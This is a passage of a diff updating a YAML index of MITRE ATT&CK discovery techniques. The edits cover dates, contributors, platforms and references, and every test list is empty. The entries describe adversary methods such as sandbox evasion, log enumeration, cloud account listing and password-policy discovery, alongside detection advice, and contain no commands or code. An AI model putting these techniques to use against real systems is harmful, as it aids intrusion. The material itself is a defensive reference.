-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50516,6 +51175,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -50526,8 +51189,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -50537,9 +51206,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50572,7 +51260,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50590,12 +51278,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50603,11 +51290,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50618,7 +51308,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50632,6 +51322,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50651,56 +51345,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50722,19 +51371,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -50805,46 +51496,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -50868,6 +51524,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -50878,9 +51537,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50890,12 +51554,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50938,12 +51629,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50954,28 +51644,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -51008,9 +51701,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -51053,7 +51745,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -51092,13 +51784,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -51139,87 +51829,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -51272,17 +51960,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
